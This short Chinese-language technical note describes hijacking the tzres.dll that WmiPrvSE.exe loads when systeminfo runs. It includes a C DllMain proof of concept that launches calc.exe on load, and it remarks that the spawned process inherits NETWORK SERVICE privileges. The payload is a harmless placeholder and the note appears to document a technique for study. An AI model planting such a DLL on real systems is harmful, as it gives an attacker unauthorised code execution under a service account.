在執行systeminfo命令時,systeminfo.exe內部通過wmi和LPC的方式獲取數據,WmiPrvse.exe在執行實際操作時會去加載tzres.dll
dll路徑:C:\Windows\System32\wbem\tzres.dll
#include <stdlib.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
system("calc.exe");
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
由於WmiPrvSE.exe是NETWORK SERVICE權限,所以被創建的子進程都繼承了這個權限。